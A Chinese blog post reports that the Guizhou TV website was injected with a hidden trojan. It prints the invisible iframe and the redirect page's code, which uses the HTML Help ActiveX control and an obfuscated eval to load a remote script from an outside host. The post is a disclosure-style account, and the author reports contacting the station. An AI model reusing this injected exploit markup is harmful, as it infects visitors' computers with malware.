今天从朋友博客上看到贵州电视台(http://www.gzstv.com)的链接，于是就点击进去看看。
没想到被人挂了木马上去，唉~~~贵州的網絡安全人才到哪儿去了？[face09]

电视台主页面

瑞星报警

挂马的代码

加入的代码

<IFRAME marginWidth=0 marginHeight=0 src="http://www.0451wu.com/bbs/Skins/Default/css/test/image.htm" frameBorder=0 width=0 height=0></IFRAME>

打开http://www.0451wu.com/bbs/Skins/Default/css/test/image.htm之后又会转到这个链接

再一查看，发现windows.htm的代码如下

<SCRIPTlanguage=VScriptsrc="young.gif"></SCRIPT><SCRIPTlanguage=VScriptsrc="young.css"></SCRIPT><HTML><BODY><divstyle="display:none"><OBJECTid="news728"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl"><PARAMname="Item1"value='command;/windows/help/apps.chm');</OBJECT><OBJECTid="news683"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl"><PARAMname="Item1"value='command;javascript:if(1==1){eval("document.write(\"<SCRIPTlanguage=JScriptsrc=\\\"http://www.0451wu.com/bbs/Skins/Default/css/test/young.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")}'></OBJECT></div><SCRIPT>news728.Click();f1=1+1;f1=f1+2;setTimeout("news683.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>

通过挂马的网站来看，看来是一名东北人搞的咯~~

后来发邮件给电视台的台长信箱，没有回音！！晕！

昨天打了电话给百姓关注，我想百姓的事他们都关注，自己的事更是应该关注！

今天打开网站，找不到那些木马代码了~~5.11